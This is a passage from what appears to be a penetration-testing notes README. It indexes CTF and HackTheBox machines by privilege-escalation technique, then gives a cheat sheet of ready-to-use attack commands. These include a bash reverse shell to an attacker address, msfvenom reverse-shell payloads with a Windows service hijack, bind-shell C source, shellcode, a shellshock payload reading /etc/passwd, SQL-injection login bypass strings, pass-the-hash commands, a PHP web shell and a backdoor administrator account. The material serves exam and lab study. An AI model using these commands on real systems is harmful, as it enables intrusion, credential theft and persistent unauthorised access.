[⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_ssh_knownhosts"></a> #### privesc_ssh_knownhosts [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | --- <a name="privesc_strace_setuid"></a> #### privesc_strace_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_sudo"></a> #### privesc_sudo [⇡](#privesc) using `sudo` to execute programs that run with elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_sudoers"></a> #### privesc_sudoers [⇡](#privesc) being able to edit the `/etc/sudoers` file to give a user elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_tmux_rootsession"></a> #### privesc_tmux_rootsession [⇡](#privesc) --- <a name="privesc_windows_ms10_059"></a> #### privesc_windows_ms10_059 [⇡](#privesc) ```shell wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe sharehttp <targetport> certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe nc -nlvp 444 pe.exe <attackerip> 444 ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri --- <a name="privesc_windows_ms11_046"></a> #### privesc_windows_ms11_046 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="privesc_windows_ms14_070"></a> #### privesc_windows_ms14_070 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | --- <a name="privesc_windows_ms15_051"></a> #### privesc_windows_ms15_051 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | --- <a name="privesc_windows_ms16_032"></a> #### privesc_windows_ms16_032 [⇡](#privesc) --- <a name="privesc_windows_ms16_098"></a> #### privesc_windows_ms16_098 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | --- <a name="privesc_windows_upnphost"></a> #### privesc_windows_upnphost [⇡](#privesc) On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service. ```shell msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe # upload pe.exe file to the target system sudo nc -nlvp <attackerport> sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe" sc qc upnphost sc config upnphost obj= ".\LocalSystem" password= "" sc config SSDPSRV start= auto net start SSDPSRV net start upnphost ``` [+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html --- <a name="tips"></a> ## ⚡ Tips [↟](#contents) ### bind shell [🡑](#tips) ``` bs.c #include <sys/socket.h> #include <netinet/in.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char* argv[]) { int host_sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in host_addr; host_addr.sin_family = AF_INET; host_addr.sin_port = htons(atoi(argv[1])); host_addr.sin_addr.s_addr = INADDR_ANY; bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)); listen(host_sock, 0); int client_sock = accept(host_sock, NULL, NULL); dup2(client_sock, 0); dup2(client_sock, 1); dup2(client_sock, 2); execve("/bin/bash", NULL, NULL); } gcc -m32 -o bs bs.c ./bs 4444 ``` ### buffer overflow [🡑](#tips) ``` payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length> pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport> pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address> nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax bad characters: badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") find address for "jmp esp" using mona.py: !mona jmp -r esp -b <list of bad chars> gcc compilation options: linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 -wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support references: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md ``` ### file transfers [🡑](#tips) ``` certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')" python3 -m pyftpdlib -p 21 rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries gzip+xxd: sender: gzip -c < file > file.gz xxd -p file.gz | tr -d '\n' && echo receiver: echo 1f8b...0000 > /tmp/file.gz.hex xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz gunzip -c < /tmp/file.gz > /tmp/file automate file download via windows ftp client: echo open <targetip> >ftp_commands.txt echo anonymous >>ftp_commands.txt echo whatever >>ftp_commands.txt echo binary >>ftp_commands.txt echo get met8888.exe >>ftp_commands.txt echo bye >>ftp_commands.txt ftp -s:ftp_commands.txt create wget.vbs and download netcat: >C:\Windows\d.vbs echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs echo Err.Clear >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs echo http.Open "GET", strURL, False >>C:\Windows\d.vbs echo http.Send >>C:\Windows\d.vbs echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs echo strData = "" >>C:\Windows\d.vbs echo strBuffer = "" >>C:\Windows\d.vbs echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs echo Next >>C:\Windows\d.vbs echo ts.Close >>C:\Windows\d.vbs dir C:\Windows\d.vbs C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe netcat: nc -w3 <targetip> 1234 <file.sent cmd /c nc.exe -l -v -p 1234 >file.rcvd smb (139/tcp, 445/tcp): server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat client: list files: smbclient -L <targetip> --no-pass list files: net view \\<targetip> list files: dir \\<targetip>\shared copy files: copy \\<targetip>\shared\met8888.exe execute files: \\<targetip>\shared\met8888.exe tftp (69/udp): server: atftpd --daemon --port 69 $HOME/toolbox/scripts/shared metasploit: use auxiliary/server/tftp set TFTPROOT $HOME/toolbox/scripts/shared exploit client: download: tftp -i <targetip> GET met8888.exe upload: tftp -i <targetip> PUT hashes.txt install: pkgmgr /iu:"TFTP" ``` ### heartbleed [🡑](#tips) ``` nmap --script=ssl-heartbleed -p <targetport> <targetip> https://github.com/sensepost/heartbleed-poc python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` ### iptables [🡑](#tips) ``` config file: /etc/iptables/rules.v4 ``` ### lfi/rfi/image upload [🡑](#tips) ``` scan: uniscan -u http://<targetip>/ -qweds wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ php b64 leak and command execution: php://filter/convert.base64-encode/resource=<pagename> <?php echo passthru($_GET[cmd]) ?> bypass upload filter: change extension to PHP, PHP3, PHP4, PHP5 add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index notice urls that accept a generic filename as parameter: ?page=file1.php ?page=../../../../../../etc/passwd ?page=../../../../../../windows/system32/drivers/etc/hosts ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8): /etc/passwd /proc/self/status find home username in passwd, locate home directory for user: /var/lib/asterisk/.ssh/id_rsa ``` ### passthehash [🡑](#tips) ``` pth-toolkit: git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd xfreerdp: apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP meterpreter: meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell misc: fgdump.exe /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost ``` ### passwords [🡑](#tips) ``` shadow file structure: $id$salt$password generate shadow file hash: mkpasswd -m md5 password salt mkpasswd -m sha-256 password salt mkpasswd -m sha-512 password salt ``` ### persistence [🡑](#tips) ``` add a new administrator user: net user anderson cooper /add && net localgroup administrators anderson /add add user to rdp group: net localgroup "Remote Desktop Users" anderson /add enable rdp in firewall: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable netsh firewall add portopening TCP <targetport> "RDP" enable rdp via registry (requries reboot): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f is rdp service running: tasklist /svc | findstr /c:TermService start rdp service: net start TermService permanently enable rdp service: sc config TermService start=auto code: useradd.c: #include <stdlib.h> int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } add user: #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } # compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c ``` ### port forward [🡑](#tips) ``` socat: socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 & socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 & plink: plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip> meterpreter: # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip> kali > rdesktop 127.0.0.1:<targetport> ``` ### portknock [🡑](#tips) ``` knock once on port <targetport>/tcp: hping3 <targetip> -S -p <targetport> -c 1 nc -vvvz <targetip> <targetport> knock on multiple tcp ports in a given sequence: hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1 nmap -Pn -sT -r -p666,7000,8890 <targetip> ``` ### restricted shells [🡑](#tips) ``` rbash: bash -i BASH_CMDS[foobar]=/bin/bash;foobar lshell: echo os.system("/bin/bash") ``` ### reverse shell [🡑](#tips) ``` reverse tcp shell from bash: /bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1 make a partially interactive terminal usable: target: python -c "import pty; pty.spawn('/bin/bash')" local: stty raw -echo ; fg target: reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size reverse php shell on windows: https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php ``` ### shellcode [🡑](#tips) ``` /bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` ### shellshock [🡑](#tips) ``` look for /cgi-bin/ directory (incldue 403 code for gobuster scan) check for scripts (-x sh,pl) using gobuster test http header, user-agent probably curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` ### sql injection [🡑](#tips) ``` manual verification: ' or 1=1 -- - ' || 1=1 # or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 find a row where you can place your output: http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 get db version: http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5 get current user: http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5 see all tables: http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables get column names for a specified table: http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users' concat user names and passwords: http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users write to a file: http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile' ``` ### startup scripts [🡑](#tips) ``` chmod +x /foo/bar update-rc.d /foo/bar defaults ``` ### stegnography [🡑](#tips) ``` strings exiftool steghide ``` ### tmux shortcuts [🡑](#tips) ``` prefix: ctrl + b toggle logging: prefix + shift + p screen cap: prefix + alt + p complete history: prefix + alt + shift + p ``` ### tunneling [🡑](#tips) ``` connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>: proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234 ssh john@127.0.0.1 /bin/bash vim /etc/proxychains.conf http <targetip> <targetport> proxychains nmap -sT -p22 <targetip> proxychains ssh <username>@<targetip> /bin/bash forward remote port to local address: 